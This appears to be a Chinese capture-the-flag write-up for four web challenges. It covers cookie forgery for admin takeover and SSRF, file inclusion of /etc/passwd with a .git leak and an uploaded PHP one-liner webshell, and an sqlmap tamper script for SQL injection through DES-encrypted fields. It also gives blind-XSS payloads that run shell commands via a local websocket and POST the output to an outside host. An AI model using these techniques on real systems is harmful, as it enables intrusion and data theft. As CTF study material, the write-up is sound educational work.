WEB 1

http://117.34.117.216/

随便注册个账号,然后登陆,

设置cookie的时候是把用户名进行base64编码,把这里改成admin的base64编码.

登录后右上角有个修改密码的链接,

重置admin的密码后再登陆.

在远程图片地址写入http://127.0.0.1/flag.php,可以读取到flag.

WEB 2

存在文件包含和GIT泄露.

http://117.34.116.192/index.php?file=/etc/passwd

http://117.34.116.192/.git

利用GIT泄露拿到源码,其中upload.php能上传文件.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 <?php
function Administrator($value){
if(empty($_COOKIE['in_adminid']) || empty($_COOKIE['in_adminexpire']) || $_COOKIE['in_adminexpire']!==md5($_COOKIE['in_adminid'].$_COOKIE['in_adminname'].$_COOKIE['in_adminpassword'].$_COOKIE['in_permission'])){
return False;
}
setcookie("in_adminexpire",$_COOKIE['in_adminexpire'],time()+1800);
if(!empty($_COOKIE['in_permission'])){
$array=explode(",",$_COOKIE['in_permission']);
$adminlogined=false;
for($i=0;$i<count($array);$i++){
if($array[$i]==$value){$adminlogined=true;}
}
if(!$adminlogined){
return False;
}
}else{
return False;
}
return true;
}
if (Administrator(2)){
if(isset($_FILES['file'])){
$filename = './img/img'.rand().'.jpg';
move_uploaded_file($_FILES["file"]["tmp_name"],$filename);
header('Refresh:3,url=index.php?file=upload.php');
echo "Upload $filename Success!";
die;
}
}else{
header('Refresh:3,url=index.php?file=login.html');
echo "Who are you!";
die;
}
?>

COOKIE的构造很简单,先上传个一句话,

然后包含即可.

拿到的flag发现经过了PM9SCREW加密,找个付费的解密网站就能解.

WEB 3

http://45.76.49.10:8001/

直接用pc端的浏览器会跳转到QQ空间,想到不久前先知的一篇文章:

https://xz.aliyun.com/t/2322

抓包发现了2个请求,首先加载一个JS.

获取到的JS加密了.

1
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("..."))))

这里先对密文进行base64解码=>RC4解密=>URL解码,然写入当前页面.只需要简单做下修改就能拿到明文了.

找到其中发送账号密码的请求,

1
2
3
4
5
6
7
8
9
10
11
if (!err){
$.ajax({
url:'/f701fee85540b78d08cb276d14953d58',
type:'POST',
dataType:'json',
data: "data="+encodeURIComponent(encryptByDES($('#loginform').serialize(),key)),
error:function(er){
window.location.href='https://qzone.qq.com';
}
})
}

发送的数据会先DES加密,输出明文和密钥看下.

测试后发现密码字段存在注入,用PHP写个中转脚本.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$ip = $_GET['ip'];
$name = $_GET['name'];
$pwd = $_GET['pwd'];
$p = "ip={$ip}&hrUW3PG7mp3RLd3dJu={$name}&LxMzAX2jog9Bpjs07jP={$pwd}";

function des_encrypt($str, $key) {
$block = mcrypt_get_block_size('des', 'ecb');
$pad = $block - (strlen($str) % $block);
$str .= str_repeat(chr($pad), $pad);
return mcrypt_encrypt(MCRYPT_DES, $key, $str, MCRYPT_MODE_ECB);
}
$c = urlencode(base64_encode(des_encrypt($p,"MiaoMiao")));
$post = "data=".$c;
//$post = ['data' => $c,]; 这样写是content-type是上传文件的!!被坑了好久

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Requested-With: XMLHttpRequest',));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$ch_out = curl_exec($ch);
curl_close($ch);

或者写个sqlmap的tamper,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python


from lib.core.enums import PRIORITY
from pyDes import *
import base64

__priority__ = PRIORITY.LOW


def des_enc(key, str):
print str
k = des(key, ECB, pad=None, padmode=PAD_PKCS5)
encrypt_str = k.encrypt(str)
return base64.b64encode(encrypt_str)


def dependencies():
pass


def tamper(payload, **kwargs):
p = "ip=1&hrUW3PG7mp3RLd3dJu=1&LxMzAX2jog9Bpjs07jP=%s" % payload
enc_data = des_enc(bytes("MiaoMiao"), bytes(p))
return enc_data

WEB4

一个没过滤的XSS盲打,并且给了一段代码提示.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
type msg struct {
Cmd string `json:"cmd"`
}

func main() {
app := sweetygo.New("./", nil)
app.GET("/ws", ws)
app.RunServer(":8002")
}

func ws(ctx *sweetygo.Context) {
conn, _ := websocket.Upgrade(ctx.Resp, ctx.Req, ctx.Resp.Header(), 1024, 1024)
for {
m := msg{}
err := conn.ReadJSON(&m)
if err != nil {
fmt.Println("Error reading json.", err)
break
}

res := exec(m.Cmd)
fmt.Println(res)
if err = conn.WriteJSON(res); err != nil {
fmt.Println(err)
break
}
}
}

看上去是在8002端口启了一个websocket server,并且存在命令执行.

所以思路就是利用XSS去请求websocket来执行命令.

另外,如果去读整个dom的话,可以看到其它人插入的XSS,这样就能看到大佬的payload了😁

payload(1):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script> 
var socket = new WebSocket("ws://127.0.0.1:8002/ws");
socket.onopen = function(e) {
socket.send(JSON.stringify({cmd:"ls"}))
};
socket.onmessage = function (e) {
$.ajax(
{
type: "POST",
url: "//ip:1027/",
data: JSON.parse(e.data),
dataType: "JSON"
}
);
};
</script>

payload(2):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script> 
var socket = new WebSocket("ws://127.0.0.1:8002/ws");
socket.onopen = function(e) {
socket.send(JSON.stringify({cmd:"cat flaaaaag.txt"}))
};
socket.onmessage = function (e) {
$.ajax(
{
type: "POST",
url: "//ip:1028/",
data: JSON.parse(e.data),
dataType: "JSON"
}
);
};
</script>